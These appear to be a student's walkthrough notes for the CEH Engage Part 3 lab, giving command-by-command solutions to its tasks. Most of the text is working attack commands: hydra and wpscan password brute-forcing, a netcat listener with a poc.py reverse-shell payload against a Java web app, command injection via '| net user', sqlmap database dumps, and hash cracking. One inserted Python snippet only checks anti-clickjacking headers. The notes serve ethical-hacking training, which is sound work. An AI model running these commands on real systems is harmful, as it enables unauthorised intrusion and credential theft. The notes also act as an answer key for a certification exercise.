3️⃣CEH Engage Part 3

You have been assigned a task to perform a clickjacking test on www.certifiedhacker.com that the CEHORG members widely use. Find out whether the site is vulnerable to clickjacking.

GhostEye

Nikto
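
A clickjacking test of this kind comes down to whether the response carries an enforced anti-framing header. The following is an added example, not part of the original notes or of either tool; the function names are hypothetical and the header sets are constructed samples rather than output from the lab target.

```python
# Added example: decide from response headers whether a page can be framed.
VALID_XFO = {"DENY", "SAMEORIGIN"}   # ALLOW-FROM is obsolete; current browsers ignore it
BROAD = {"*", "http:", "https:"}     # heuristic: sources that let any site frame the page

def frame_ancestors(policy):
    """Return the frame-ancestors source list of one CSP policy, or None if absent."""
    for directive in policy.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]
    return None

def framing_protection(headers):
    """headers: list of (name, value) pairs. Returns (protected, reason)."""
    xfo, policies = [], []
    for name, value in headers:
        name = name.strip().lower()
        if name == "x-frame-options":
            xfo += [v.strip().upper() for v in value.split(",")]
        elif name == "content-security-policy":   # the -Report-Only header is not enforced
            found = (frame_ancestors(p) for p in value.split(","))
            policies += [fa for fa in found if fa is not None]
    if policies:
        # An enforced frame-ancestors directive replaces X-Frame-Options entirely.
        if any(not BROAD.intersection(fa) for fa in policies):
            return True, "CSP frame-ancestors restricts framing"
        return False, "CSP frame-ancestors allows any origin; X-Frame-Options is ignored"
    if VALID_XFO.intersection(xfo):
        return True, "X-Frame-Options " + ", ".join(xfo)
    if xfo:
        return False, "X-Frame-Options value not honoured: " + ", ".join(xfo)
    return False, "no X-Frame-Options or CSP frame-ancestors header"

# Constructed sample responses covering the common misconfigurations.
SAMPLES = {
    "no header": [("Server", "nginx")],
    "xfo deny": [("X-Frame-Options", "DENY")],
    "allow-from": [("X-Frame-Options", "ALLOW-FROM https://portal.example")],
    "report-only": [("Content-Security-Policy-Report-Only", "frame-ancestors 'none'")],
    "csp self": [("Content-Security-Policy", "default-src 'self'; frame-ancestors 'self'")],
    "csp star": [("Content-Security-Policy", "frame-ancestors *"), ("X-Frame-Options", "DENY")],
}

if __name__ == "__main__":
    for label, hdrs in SAMPLES.items():
        protected, reason = framing_protection(hdrs)
        print(f"{label:12} {'protected' if protected else 'FRAMEABLE':10} {reason}")
```

A "FRAMEABLE" result here means the header-level defence is missing or not enforced, which is the condition the task asks about.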

Perform an HTTP-recon on www.certifiedhacker.com and find out the version of Nginx used by the web server.

BillCipher

Whatweb

An FTP site is hosted on a machine in the CEHORG network. Crack the FTP credentials, obtain the “flag.txt” file and determine the content in the file.

nmap -p 21 172.16.0.0/24

nmap -p 21 10.10.10.0/24

nmap -p 21 192.168.0.0/24

hydra -L <username.txt> -P <password.txt> ftp://172.16.0.12

Perform web application reconnaissance on movies.cehorg.com and find out the HTTP server used by the web application.

Whatweb

whatweb movies.cehorg.com

Nmap

Identify the load balancing service used by eccouncil.org.

lbd eccouncil.org

-> cloudflare

Identify the Content Management System used by www.cehorg.com.

wig www.cehorg.com

Perform a brute-force attack on www.cehorg.com and find the password of user adam.

wpscan --url http://cehorg.com/wp-login.php -U <username.txt> -P <password.txt>

Perform parameter tampering on movies.cehorg.com and find out the user for id 1003.

Type the username as "Jason" and password as "welcome"

We found this username and password in Engage Part 2, while dumping the Wireshark capture data. Remember?

You have identified a vulnerable web application on a Linux server at port 8080. Exploit the web application vulnerability, gain access to the server and enter the content of RootFlag.txt as the answer.

nmap -p 8080 172.16.0.0/24

nmap -p 8080 10.10.10.0/24

nmap -p 8080 192.168.0.0/24

Extract and set up the JDK

tar -xf jdk-8u202-linux-x64.tar.gz

mv jdk1.8.0_202 /usr/bin

Update the JDK path in the poc.py file

Change line 62: replace jdk1.8.0_20/bin/javac with "/usr/bin/jdk1.8.0_202/bin/javac"

Change line 87: replace jdk1.8.0_20/bin/java with "/usr/bin/jdk1.8.0_202/bin/java"

Change line 99: replace jdk1.8.0_20/bin/java with "/usr/bin/jdk1.8.0_202/bin/java"

Create a Netcat Listener

nc -lvp 9001

Create a Payload

python3 poc.py --userip 10.10.1.13 --webport 8080 --lport 9001

Copy the "send me" payload, paste it into the username field, enter any random password and press Login

Perform command injection attack on 10.10.10.25 and find out how many user accounts are registered with the machine. Note: Exclude admin/Guest user

| net user

A file named Hash.txt has been uploaded through DVWA (http://10.10.10.25:8080/DVWA). The file is located in the directory mentioned below. Access the file and crack the MD5 hash to reveal the original message; enter the content after cracking the hash. You can log into the DVWA using the following credentials.

Note: Username- admin; Password- password

Path: C:\wamp64\www\DVWA\hackable\uploads\Hash.txt

Hint: Use “type” command to view the file. Use the following link to decrypt the hash- https://hashes.com/en/decrypt/hash

Perform Banner grabbing on the web application movies.cehorg.com and find out the ETag of the respective target machine.

Perform Web Crawling on the web application movies.cehorg.com and identify the number of live png files in images folder.

Perform XSS vulnerability test on www.cehorg.com and identify whether the application is vulnerable to attack or not. (Yes/No).

-> No

PwnXSS

python3 pwnxss.py -u http://www.cehorg.com

OWASP ZAP

Perform a SQL Injection attack on movies.cehorg.com and find out the number of users available in the database. Use Jason/welcome as login credentials.

Get Database

sqlmap -u "http://sometestdb.to/view?id=123&Submit=Submit#" --cookie="PHPSESSID=e3f9231953973ace4acb63cfde2ccc08; security=low" --dbs

Get Tables

sqlmap -u "http://sometestdb.to/view?id=123&Submit=Submit#" --cookie="PHPSESSID=e3f9231953973ace4acb63cfde2ccc08; security=low" -D moviescope --tables

Get number of Users available

sqlmap -u "http://sometestdb.to/view?id=123&Submit=Submit#" --cookie="PHPSESSID=e3f9231953973ace4acb63cfde2ccc08; security=low" -D moviescope -T UserProfile --count

Dump Table Data

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<Cookie Value>" -D moviescope -T User_Login --dump

Dump Databases

sqlmap -u "http://sometestdb.to/view?id=123&Submit=Submit#" --cookie="PHPSESSID=e3f9231953973ace4acb63cfde2ccc08; security=low" -D moviescope --dump-all

CEHORG suspects a possible session hijacking attack on a machine in its network. The organisation has retained the network traffic data for the session at C:\Users\Admin\Documents in the EH Workstation – 2 as sniffsession.pcap. You have been assigned a task to perform an analysis and find out the protocol that has been used for sniffing on its network.
